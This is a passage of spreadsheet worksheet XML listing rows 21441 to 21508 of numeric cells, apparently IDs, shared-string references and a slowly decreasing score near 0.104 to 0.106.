      <c r="A21441" s="1">
        <v>19863.0</v>
      </c>
      <c r="B21441" s="2">
        <v>5.7157418E7</v>
      </c>
      <c r="C21441" s="2" t="s">
        <v>20698</v>
      </c>
      <c r="D21441" s="2">
        <v>1.0</v>
      </c>
      <c r="E21441" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21441" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="21442" ht="15.75" customHeight="1">
      <c r="A21442" s="1">
        <v>28686.0</v>
      </c>
      <c r="B21442" s="2">
        <v>2.7596875E7</v>
      </c>
      <c r="C21442" s="2" t="s">
        <v>20408</v>
      </c>
      <c r="D21442" s="2">
        <v>1.0</v>
      </c>
      <c r="E21442" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21442" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="21443" ht="15.75" customHeight="1">
      <c r="A21443" s="1">
        <v>186.0</v>
      </c>
      <c r="B21443" s="2">
        <v>1.4278727E7</v>
      </c>
      <c r="C21443" s="2" t="s">
        <v>20699</v>
      </c>
      <c r="D21443" s="2">
        <v>1.0</v>
      </c>
      <c r="E21443" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21443" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="21444" ht="15.75" customHeight="1">
      <c r="A21444" s="1">
        <v>1171.0</v>
      </c>
      <c r="B21444" s="2">
        <v>2.4608817E7</v>
      </c>
      <c r="C21444" s="2" t="s">
        <v>20700</v>
      </c>
      <c r="D21444" s="2">
        <v>1.0</v>
      </c>
      <c r="E21444" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21444" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="21445" ht="15.75" customHeight="1">
      <c r="A21445" s="1">
        <v>4137.0</v>
      </c>
      <c r="B21445" s="2">
        <v>4.1387443E7</v>
      </c>
      <c r="C21445" s="2" t="s">
        <v>20701</v>
      </c>
      <c r="D21445" s="2">
        <v>1.0</v>
      </c>
      <c r="E21445" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21445" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="21446" ht="15.75" customHeight="1">
      <c r="A21446" s="1">
        <v>5324.0</v>
      </c>
      <c r="B21446" s="2">
        <v>4.5297871E7</v>
      </c>
      <c r="C21446" s="2" t="s">
        <v>20702</v>
      </c>
      <c r="D21446" s="2">
        <v>1.0</v>
      </c>
      <c r="E21446" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21446" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="21447" ht="15.75" customHeight="1">
      <c r="A21447" s="1">
        <v>8640.0</v>
      </c>
      <c r="B21447" s="2">
        <v>5.4331053E7</v>
      </c>
      <c r="C21447" s="2" t="s">
        <v>20703</v>
      </c>
      <c r="D21447" s="2">
        <v>1.0</v>
      </c>
      <c r="E21447" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21447" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="21448" ht="15.75" customHeight="1">
      <c r="A21448" s="1">
        <v>9447.0</v>
      </c>
      <c r="B21448" s="2">
        <v>5.5818755E7</v>
      </c>
      <c r="C21448" s="2" t="s">
        <v>20704</v>
      </c>
      <c r="D21448" s="2">
        <v>1.0</v>
      </c>
      <c r="E21448" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21448" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="21449" ht="15.75" customHeight="1">
      <c r="A21449" s="1">
        <v>9475.0</v>
      </c>
      <c r="B21449" s="2">
        <v>5.5869254E7</v>
      </c>
      <c r="C21449" s="2" t="s">
        <v>20705</v>
      </c>
      <c r="D21449" s="2">
        <v>1.0</v>
      </c>
      <c r="E21449" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21449" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="21450" ht="15.75" customHeight="1">
      <c r="A21450" s="1">
        <v>10233.0</v>
      </c>
      <c r="B21450" s="2">
        <v>5.7491902E7</v>
      </c>
      <c r="C21450" s="2" t="s">
        <v>20706</v>
      </c>
      <c r="D21450" s="2">
        <v>1.0</v>
      </c>
      <c r="E21450" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21450" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="21451" ht="15.75" customHeight="1">
      <c r="A21451" s="1">
        <v>28965.0</v>
      </c>
      <c r="B21451" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C21451" s="2" t="s">
        <v>1485</v>
      </c>
      <c r="D21451" s="2">
        <v>1.0</v>
      </c>
      <c r="E21451" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21451" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="21452" ht="15.75" customHeight="1">
      <c r="A21452" s="1">
        <v>29488.0</v>
      </c>
      <c r="B21452" s="2">
        <v>3.2550254E7</v>
      </c>
      <c r="C21452" s="2" t="s">
        <v>20707</v>
      </c>
      <c r="D21452" s="2">
        <v>1.0</v>
      </c>
      <c r="E21452" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21452" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="21453" ht="15.75" customHeight="1">
      <c r="A21453" s="1">
        <v>6027.0</v>
      </c>
      <c r="B21453" s="2">
        <v>4.753387E7</v>
      </c>
      <c r="C21453" s="2" t="s">
        <v>20708</v>
      </c>
      <c r="D21453" s="2">
        <v>1.0</v>
      </c>
      <c r="E21453" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21453" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="21454" ht="15.75" customHeight="1">
      <c r="A21454" s="1">
        <v>8074.0</v>
      </c>
      <c r="B21454" s="2">
        <v>5.3004969E7</v>
      </c>
      <c r="C21454" s="2" t="s">
        <v>20709</v>
      </c>
      <c r="D21454" s="2">
        <v>1.0</v>
      </c>
      <c r="E21454" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21454" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="21455" ht="15.75" customHeight="1">
      <c r="A21455" s="1">
        <v>8319.0</v>
      </c>
      <c r="B21455" s="2">
        <v>5.3633042E7</v>
      </c>
      <c r="C21455" s="2" t="s">
        <v>20710</v>
      </c>
      <c r="D21455" s="2">
        <v>1.0</v>
      </c>
      <c r="E21455" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21455" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="21456" ht="15.75" customHeight="1">
      <c r="A21456" s="1">
        <v>13364.0</v>
      </c>
      <c r="B21456" s="2">
        <v>3.4804713E7</v>
      </c>
      <c r="C21456" s="2" t="s">
        <v>20711</v>
      </c>
      <c r="D21456" s="2">
        <v>1.0</v>
      </c>
      <c r="E21456" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21456" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="21457" ht="15.75" customHeight="1">
      <c r="A21457" s="1">
        <v>28452.0</v>
      </c>
      <c r="B21457" s="2">
        <v>2.6593589E7</v>
      </c>
      <c r="C21457" s="2" t="s">
        <v>20712</v>
      </c>
      <c r="D21457" s="2">
        <v>1.0</v>
      </c>
      <c r="E21457" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21457" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="21458" ht="15.75" customHeight="1">
      <c r="A21458" s="1">
        <v>30853.0</v>
      </c>
      <c r="B21458" s="2">
        <v>4.5979084E7</v>
      </c>
      <c r="C21458" s="2" t="s">
        <v>20713</v>
      </c>
      <c r="D21458" s="2">
        <v>1.0</v>
      </c>
      <c r="E21458" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21458" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="21459" ht="15.75" customHeight="1">
      <c r="A21459" s="1">
        <v>614.0</v>
      </c>
      <c r="B21459" s="2">
        <v>1.9445861E7</v>
      </c>
      <c r="C21459" s="2" t="s">
        <v>20714</v>
      </c>
      <c r="D21459" s="2">
        <v>1.0</v>
      </c>
      <c r="E21459" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21459" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="21460" ht="15.75" customHeight="1">
      <c r="A21460" s="1">
        <v>716.0</v>
      </c>
      <c r="B21460" s="2">
        <v>2.0613251E7</v>
      </c>
      <c r="C21460" s="2" t="s">
        <v>20715</v>
      </c>
      <c r="D21460" s="2">
        <v>1.0</v>
      </c>
      <c r="E21460" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21460" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="21461" ht="15.75" customHeight="1">
      <c r="A21461" s="1">
        <v>4383.0</v>
      </c>
      <c r="B21461" s="2">
        <v>4.2185715E7</v>
      </c>
      <c r="C21461" s="2" t="s">
        <v>20716</v>
      </c>
      <c r="D21461" s="2">
        <v>1.0</v>
      </c>
      <c r="E21461" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21461" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="21462" ht="15.75" customHeight="1">
      <c r="A21462" s="1">
        <v>5372.0</v>
      </c>
      <c r="B21462" s="2">
        <v>4.5397044E7</v>
      </c>
      <c r="C21462" s="2" t="s">
        <v>20717</v>
      </c>
      <c r="D21462" s="2">
        <v>1.0</v>
      </c>
      <c r="E21462" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21462" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="21463" ht="15.75" customHeight="1">
      <c r="A21463" s="1">
        <v>6580.0</v>
      </c>
      <c r="B21463" s="2">
        <v>4.8920371E7</v>
      </c>
      <c r="C21463" s="2" t="s">
        <v>20718</v>
      </c>
      <c r="D21463" s="2">
        <v>1.0</v>
      </c>
      <c r="E21463" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21463" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="21464" ht="15.75" customHeight="1">
      <c r="A21464" s="1">
        <v>6951.0</v>
      </c>
      <c r="B21464" s="2">
        <v>4.9963684E7</v>
      </c>
      <c r="C21464" s="2" t="s">
        <v>20719</v>
      </c>
      <c r="D21464" s="2">
        <v>1.0</v>
      </c>
      <c r="E21464" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21464" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="21465" ht="15.75" customHeight="1">
      <c r="A21465" s="1">
        <v>25767.0</v>
      </c>
      <c r="B21465" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C21465" s="2" t="s">
        <v>20720</v>
      </c>
      <c r="D21465" s="2">
        <v>1.0</v>
      </c>
      <c r="E21465" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21465" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="21466" ht="15.75" customHeight="1">
      <c r="A21466" s="1">
        <v>29139.0</v>
      </c>
      <c r="B21466" s="2">
        <v>3.0554327E7</v>
      </c>
      <c r="C21466" s="2" t="s">
        <v>20721</v>
      </c>
      <c r="D21466" s="2">
        <v>1.0</v>
      </c>
      <c r="E21466" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21466" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="21467" ht="15.75" customHeight="1">
      <c r="A21467" s="1">
        <v>362.0</v>
      </c>
      <c r="B21467" s="2">
        <v>1.6177176E7</v>
      </c>
      <c r="C21467" s="2" t="s">
        <v>20722</v>
      </c>
      <c r="D21467" s="2">
        <v>1.0</v>
      </c>
      <c r="E21467" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21467" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21468" ht="15.75" customHeight="1">
      <c r="A21468" s="1">
        <v>461.0</v>
      </c>
      <c r="B21468" s="2">
        <v>1.7282086E7</v>
      </c>
      <c r="C21468" s="2" t="s">
        <v>20723</v>
      </c>
      <c r="D21468" s="2">
        <v>1.0</v>
      </c>
      <c r="E21468" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21468" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21469" ht="15.75" customHeight="1">
      <c r="A21469" s="1">
        <v>1102.0</v>
      </c>
      <c r="B21469" s="2">
        <v>2.3976614E7</v>
      </c>
      <c r="C21469" s="2" t="s">
        <v>20724</v>
      </c>
      <c r="D21469" s="2">
        <v>1.0</v>
      </c>
      <c r="E21469" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21469" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21470" ht="15.75" customHeight="1">
      <c r="A21470" s="1">
        <v>1787.0</v>
      </c>
      <c r="B21470" s="2">
        <v>2.909613E7</v>
      </c>
      <c r="C21470" s="2" t="s">
        <v>20725</v>
      </c>
      <c r="D21470" s="2">
        <v>1.0</v>
      </c>
      <c r="E21470" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21470" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21471" ht="15.75" customHeight="1">
      <c r="A21471" s="1">
        <v>7476.0</v>
      </c>
      <c r="B21471" s="2">
        <v>5.1328206E7</v>
      </c>
      <c r="C21471" s="2" t="s">
        <v>20726</v>
      </c>
      <c r="D21471" s="2">
        <v>1.0</v>
      </c>
      <c r="E21471" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21471" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21472" ht="15.75" customHeight="1">
      <c r="A21472" s="1">
        <v>7496.0</v>
      </c>
      <c r="B21472" s="2">
        <v>5.1381535E7</v>
      </c>
      <c r="C21472" s="2" t="s">
        <v>20727</v>
      </c>
      <c r="D21472" s="2">
        <v>1.0</v>
      </c>
      <c r="E21472" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21472" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21473" ht="15.75" customHeight="1">
      <c r="A21473" s="1">
        <v>7979.0</v>
      </c>
      <c r="B21473" s="2">
        <v>5.2720724E7</v>
      </c>
      <c r="C21473" s="2" t="s">
        <v>20728</v>
      </c>
      <c r="D21473" s="2">
        <v>1.0</v>
      </c>
      <c r="E21473" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21473" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21474" ht="15.75" customHeight="1">
      <c r="A21474" s="1">
        <v>8556.0</v>
      </c>
      <c r="B21474" s="2">
        <v>5.4164371E7</v>
      </c>
      <c r="C21474" s="2" t="s">
        <v>20729</v>
      </c>
      <c r="D21474" s="2">
        <v>1.0</v>
      </c>
      <c r="E21474" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21474" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21475" ht="15.75" customHeight="1">
      <c r="A21475" s="1">
        <v>9014.0</v>
      </c>
      <c r="B21475" s="2">
        <v>5.4990084E7</v>
      </c>
      <c r="C21475" s="2" t="s">
        <v>20730</v>
      </c>
      <c r="D21475" s="2">
        <v>1.0</v>
      </c>
      <c r="E21475" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21475" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21476" ht="15.75" customHeight="1">
      <c r="A21476" s="1">
        <v>9110.0</v>
      </c>
      <c r="B21476" s="2">
        <v>5.5185822E7</v>
      </c>
      <c r="C21476" s="2" t="s">
        <v>20731</v>
      </c>
      <c r="D21476" s="2">
        <v>1.0</v>
      </c>
      <c r="E21476" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21476" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21477" ht="15.75" customHeight="1">
      <c r="A21477" s="1">
        <v>9309.0</v>
      </c>
      <c r="B21477" s="2">
        <v>5.5573524E7</v>
      </c>
      <c r="C21477" s="2" t="s">
        <v>20732</v>
      </c>
      <c r="D21477" s="2">
        <v>1.0</v>
      </c>
      <c r="E21477" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21477" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21478" ht="15.75" customHeight="1">
      <c r="A21478" s="1">
        <v>9935.0</v>
      </c>
      <c r="B21478" s="2">
        <v>5.6847513E7</v>
      </c>
      <c r="C21478" s="2" t="s">
        <v>20733</v>
      </c>
      <c r="D21478" s="2">
        <v>1.0</v>
      </c>
      <c r="E21478" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21478" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21479" ht="15.75" customHeight="1">
      <c r="A21479" s="1">
        <v>11885.0</v>
      </c>
      <c r="B21479" s="2">
        <v>2.508675E7</v>
      </c>
      <c r="C21479" s="2" t="s">
        <v>20734</v>
      </c>
      <c r="D21479" s="2">
        <v>1.0</v>
      </c>
      <c r="E21479" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21479" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21480" ht="15.75" customHeight="1">
      <c r="A21480" s="1">
        <v>13674.0</v>
      </c>
      <c r="B21480" s="2">
        <v>3.6037597E7</v>
      </c>
      <c r="C21480" s="2" t="s">
        <v>20735</v>
      </c>
      <c r="D21480" s="2">
        <v>1.0</v>
      </c>
      <c r="E21480" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21480" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21481" ht="15.75" customHeight="1">
      <c r="A21481" s="1">
        <v>13904.0</v>
      </c>
      <c r="B21481" s="2">
        <v>3.7074853E7</v>
      </c>
      <c r="C21481" s="2" t="s">
        <v>20736</v>
      </c>
      <c r="D21481" s="2">
        <v>1.0</v>
      </c>
      <c r="E21481" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21481" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21482" ht="15.75" customHeight="1">
      <c r="A21482" s="1">
        <v>15157.0</v>
      </c>
      <c r="B21482" s="2">
        <v>4.1975483E7</v>
      </c>
      <c r="C21482" s="2" t="s">
        <v>20737</v>
      </c>
      <c r="D21482" s="2">
        <v>1.0</v>
      </c>
      <c r="E21482" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21482" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21483" ht="15.75" customHeight="1">
      <c r="A21483" s="1">
        <v>20104.0</v>
      </c>
      <c r="B21483" s="2">
        <v>9823661.0</v>
      </c>
      <c r="C21483" s="2" t="s">
        <v>20738</v>
      </c>
      <c r="D21483" s="2">
        <v>1.0</v>
      </c>
      <c r="E21483" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21483" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21484" ht="15.75" customHeight="1">
      <c r="A21484" s="1">
        <v>21176.0</v>
      </c>
      <c r="B21484" s="2">
        <v>1.9147643E7</v>
      </c>
      <c r="C21484" s="2" t="s">
        <v>20739</v>
      </c>
      <c r="D21484" s="2">
        <v>1.0</v>
      </c>
      <c r="E21484" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21484" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21485" ht="15.75" customHeight="1">
      <c r="A21485" s="1">
        <v>21425.0</v>
      </c>
      <c r="B21485" s="2">
        <v>2.2101074E7</v>
      </c>
      <c r="C21485" s="2" t="s">
        <v>20234</v>
      </c>
      <c r="D21485" s="2">
        <v>1.0</v>
      </c>
      <c r="E21485" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21485" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21486" ht="15.75" customHeight="1">
      <c r="A21486" s="1">
        <v>23035.0</v>
      </c>
      <c r="B21486" s="2">
        <v>5.0091287E7</v>
      </c>
      <c r="C21486" s="2" t="s">
        <v>20740</v>
      </c>
      <c r="D21486" s="2">
        <v>1.0</v>
      </c>
      <c r="E21486" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21486" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21487" ht="15.75" customHeight="1">
      <c r="A21487" s="1">
        <v>23897.0</v>
      </c>
      <c r="B21487" s="2">
        <v>8457001.0</v>
      </c>
      <c r="C21487" s="2" t="s">
        <v>20741</v>
      </c>
      <c r="D21487" s="2">
        <v>1.0</v>
      </c>
      <c r="E21487" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21487" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21488" ht="15.75" customHeight="1">
      <c r="A21488" s="1">
        <v>24791.0</v>
      </c>
      <c r="B21488" s="2">
        <v>1.1992965E7</v>
      </c>
      <c r="C21488" s="2" t="s">
        <v>20742</v>
      </c>
      <c r="D21488" s="2">
        <v>1.0</v>
      </c>
      <c r="E21488" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21488" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21489" ht="15.75" customHeight="1">
      <c r="A21489" s="1">
        <v>29219.0</v>
      </c>
      <c r="B21489" s="2">
        <v>3.0811512E7</v>
      </c>
      <c r="C21489" s="2" t="s">
        <v>20743</v>
      </c>
      <c r="D21489" s="2">
        <v>1.0</v>
      </c>
      <c r="E21489" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21489" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21490" ht="15.75" customHeight="1">
      <c r="A21490" s="1">
        <v>29729.0</v>
      </c>
      <c r="B21490" s="2">
        <v>3.456165E7</v>
      </c>
      <c r="C21490" s="2" t="s">
        <v>20744</v>
      </c>
      <c r="D21490" s="2">
        <v>1.0</v>
      </c>
      <c r="E21490" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21490" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21491" ht="15.75" customHeight="1">
      <c r="A21491" s="1">
        <v>32134.0</v>
      </c>
      <c r="B21491" s="2">
        <v>5.4124275E7</v>
      </c>
      <c r="C21491" s="2" t="s">
        <v>20745</v>
      </c>
      <c r="D21491" s="2">
        <v>1.0</v>
      </c>
      <c r="E21491" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21491" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21492" ht="15.75" customHeight="1">
      <c r="A21492" s="1">
        <v>33939.0</v>
      </c>
      <c r="B21492" s="2">
        <v>9288435.0</v>
      </c>
      <c r="C21492" s="2" t="s">
        <v>20746</v>
      </c>
      <c r="D21492" s="2">
        <v>1.0</v>
      </c>
      <c r="E21492" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21492" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="21493" ht="15.75" customHeight="1">
      <c r="A21493" s="1">
        <v>3598.0</v>
      </c>
      <c r="B21493" s="2">
        <v>3.9070975E7</v>
      </c>
      <c r="C21493" s="2" t="s">
        <v>20747</v>
      </c>
      <c r="D21493" s="2">
        <v>1.0</v>
      </c>
      <c r="E21493" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21493" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="21494" ht="15.75" customHeight="1">
      <c r="A21494" s="1">
        <v>13334.0</v>
      </c>
      <c r="B21494" s="2">
        <v>3.4653735E7</v>
      </c>
      <c r="C21494" s="2" t="s">
        <v>20748</v>
      </c>
      <c r="D21494" s="2">
        <v>1.0</v>
      </c>
      <c r="E21494" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21494" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="21495" ht="15.75" customHeight="1">
      <c r="A21495" s="1">
        <v>13340.0</v>
      </c>
      <c r="B21495" s="2">
        <v>3.4690743E7</v>
      </c>
      <c r="C21495" s="2" t="s">
        <v>20749</v>
      </c>
      <c r="D21495" s="2">
        <v>1.0</v>
      </c>
      <c r="E21495" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21495" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="21496" ht="15.75" customHeight="1">
      <c r="A21496" s="1">
        <v>17088.0</v>
      </c>
      <c r="B21496" s="2">
        <v>4.8644088E7</v>
      </c>
      <c r="C21496" s="2" t="s">
        <v>20750</v>
      </c>
      <c r="D21496" s="2">
        <v>1.0</v>
      </c>
      <c r="E21496" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21496" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="21497" ht="15.75" customHeight="1">
      <c r="A21497" s="1">
        <v>18410.0</v>
      </c>
      <c r="B21497" s="2">
        <v>5.2673619E7</v>
      </c>
      <c r="C21497" s="2" t="s">
        <v>20751</v>
      </c>
      <c r="D21497" s="2">
        <v>1.0</v>
      </c>
      <c r="E21497" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21497" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="21498" ht="15.75" customHeight="1">
      <c r="A21498" s="1">
        <v>22809.0</v>
      </c>
      <c r="B21498" s="2">
        <v>4.6020473E7</v>
      </c>
      <c r="C21498" s="2" t="s">
        <v>20752</v>
      </c>
      <c r="D21498" s="2">
        <v>1.0</v>
      </c>
      <c r="E21498" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21498" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="21499" ht="15.75" customHeight="1">
      <c r="A21499" s="1">
        <v>34168.0</v>
      </c>
      <c r="B21499" s="2">
        <v>9923979.0</v>
      </c>
      <c r="C21499" s="2" t="s">
        <v>20753</v>
      </c>
      <c r="D21499" s="2">
        <v>1.0</v>
      </c>
      <c r="E21499" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21499" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="21500" ht="15.75" customHeight="1">
      <c r="A21500" s="1">
        <v>6298.0</v>
      </c>
      <c r="B21500" s="2">
        <v>4.8219258E7</v>
      </c>
      <c r="C21500" s="2" t="s">
        <v>20754</v>
      </c>
      <c r="D21500" s="2">
        <v>1.0</v>
      </c>
      <c r="E21500" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21500" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="21501" ht="15.75" customHeight="1">
      <c r="A21501" s="1">
        <v>6309.0</v>
      </c>
      <c r="B21501" s="2">
        <v>4.8241428E7</v>
      </c>
      <c r="C21501" s="2" t="s">
        <v>20755</v>
      </c>
      <c r="D21501" s="2">
        <v>1.0</v>
      </c>
      <c r="E21501" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21501" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="21502" ht="15.75" customHeight="1">
      <c r="A21502" s="1">
        <v>14513.0</v>
      </c>
      <c r="B21502" s="2">
        <v>3.9741986E7</v>
      </c>
      <c r="C21502" s="2" t="s">
        <v>20756</v>
      </c>
      <c r="D21502" s="2">
        <v>1.0</v>
      </c>
      <c r="E21502" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21502" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="21503" ht="15.75" customHeight="1">
      <c r="A21503" s="1">
        <v>25788.0</v>
      </c>
      <c r="B21503" s="2">
        <v>1.4674387E7</v>
      </c>
      <c r="C21503" s="2" t="s">
        <v>20757</v>
      </c>
      <c r="D21503" s="2">
        <v>1.0</v>
      </c>
      <c r="E21503" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21503" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="21504" ht="15.75" customHeight="1">
      <c r="A21504" s="1">
        <v>30087.0</v>
      </c>
      <c r="B21504" s="2">
        <v>3632558.0</v>
      </c>
      <c r="C21504" s="2" t="s">
        <v>20758</v>
      </c>
      <c r="D21504" s="2">
        <v>1.0</v>
      </c>
      <c r="E21504" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21504" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="21505" ht="15.75" customHeight="1">
      <c r="A21505" s="1">
        <v>31984.0</v>
      </c>
      <c r="B21505" s="2">
        <v>5.3251143E7</v>
      </c>
      <c r="C21505" s="2" t="s">
        <v>20759</v>
      </c>
      <c r="D21505" s="2">
        <v>1.0</v>
      </c>
      <c r="E21505" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21505" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="21506" ht="15.75" customHeight="1">
      <c r="A21506" s="1">
        <v>33428.0</v>
      </c>
      <c r="B21506" s="2">
        <v>7775522.0</v>
      </c>
      <c r="C21506" s="2" t="s">
        <v>20760</v>
      </c>
      <c r="D21506" s="2">
        <v>1.0</v>
      </c>
      <c r="E21506" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21506" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="21507" ht="15.75" customHeight="1">
      <c r="A21507" s="1">
        <v>1307.0</v>
      </c>
      <c r="B21507" s="2">
        <v>2.5695973E7</v>
      </c>
      <c r="C21507" s="2" t="s">
        <v>20761</v>
      </c>
      <c r="D21507" s="2">
        <v>1.0</v>
      </c>
      <c r="E21507" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21507" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="21508" ht="15.75" customHeight="1">
      <c r="A21508" s="1">
